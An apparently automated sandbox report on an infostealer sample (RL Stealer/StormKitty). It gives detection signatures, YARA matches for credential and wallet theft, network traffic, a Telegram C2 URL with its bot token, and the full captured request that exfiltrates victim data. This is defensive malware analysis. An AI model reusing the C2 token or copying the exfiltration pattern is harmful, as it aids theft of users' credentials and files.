Edit tour

Windows Analysis Report
B5U2ccQ8H1.exe

Overview

General Information

Sample name:	B5U2ccQ8H1.exe renamed because original name is a hash value
Original sample name:	86108d3bcc19fe774cc81b71494d31f9.exe
Analysis ID:	1468636
MD5:	86108d3bcc19fe774cc81b71494d31f9
SHA1:	d936ce0c2f3ddc35f972c3a87fcaeb036412e009
SHA256:	9a25faeade01978fd39daedd1b8fea6f4b5957a001a7227141b2ee7d714b421b
Tags:	32exe
Infos:

Detection

RL STEALER, StormKitty

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected RL STEALER

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious desktop.ini Action

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

B5U2ccQ8H1.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\B5U2ccQ8H1.exe" MD5: 86108D3BCC19FE774CC81B71494D31F9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
B5U2ccQ8H1.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
B5U2ccQ8H1.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
B5U2ccQ8H1.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
B5U2ccQ8H1.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
B5U2ccQ8H1.exe	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
B5U2ccQ8H1.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
B5U2ccQ8H1.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
B5U2ccQ8H1.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
B5U2ccQ8H1.exe	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47554:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x45360:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: B5U2ccQ8H1.exe PID: 7340	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: B5U2ccQ8H1.exe PID: 7340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B5U2ccQ8H1.exe PID: 7340	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: B5U2ccQ8H1.exe PID: 7340	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: B5U2ccQ8H1.exe PID: 7340	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x4107d:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x8ae8d:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
0.0.B5U2ccQ8H1.exe.2f0000.0.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious desktop.ini Action

Source: File created

Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\B5U2ccQ8H1.exe, ProcessId: 7340, TargetFilename: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\desktop.ini

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: B5U2ccQ8H1.exe.7340.0.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage"}

Multi AV Scanner detection for domain / URL

Source: https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for submitted file

Source: B5U2ccQ8H1.exe	ReversingLabs: Detection: 71%
Source: B5U2ccQ8H1.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: B5U2ccQ8H1.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: freegeoip.app

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File created: C:\Users\user\AppData\Roaming\928100\InstalledSoftware.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: B5U2ccQ8H1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then jmp 00E2A28Ah	0_2_00E2A048
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then jmp 00E2414Dh	0_2_00E23CD0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then jmp 00E25F11h	0_2_00E25D75
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then jmp 00E25179h	0_2_00E24EE8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then inc dword ptr [ebp-24h]	0_2_00E2C4A8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then inc dword ptr [ebp-30h]	0_2_00E287D0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]	0_2_04E009C8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 4x nop then jmp 04E05E2Ah	0_2_04E05D50

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/07/2024%201:05%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20928100%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ebfd23c8782Host: api.telegram.orgContent-Length: 719872Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1Host: dl.dropboxusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml HTTP/1.1Host: ip-api.com

Source: global traffic	DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: freegeoip.app
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/07/2024%201:05%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20928100%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9ebfd23c8782Host: api.telegram.orgContent-Length: 719872Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:05:58 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: b778406db2304ee29c53c943ff859c8fConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:05:58 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 6373bb7481014ebcb57cf2f361c3f18fConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:05:59 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: d8748e13c7ad4421848197551acad976Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:00 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 62fb7f4bf396493f8c17c48fdd5aa455Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:01 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 17752a5646d54d728935b16a0b4d6b13Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:02 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 44a9c501cfc74d34bfd694059725a2e5Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:04 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 25febb87e49241149b33d6ae0d8b8fbcConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:05 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: d33287379fe14809a65600605c9299c3Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlContent-Security-Policy: sandbox allow-forms allow-scriptsDate: Sun, 07 Jul 2024 05:06:06 GMTServer: envoyContent-Length: 925Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Robots-Tag: noindex, nofollow, noimageindexVary: Accept-EncodingX-Dropbox-Response-Origin: far_remoteX-Dropbox-Request-Id: 2b16129b50e44c43b00c31323c7cfae5Connection: close

Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
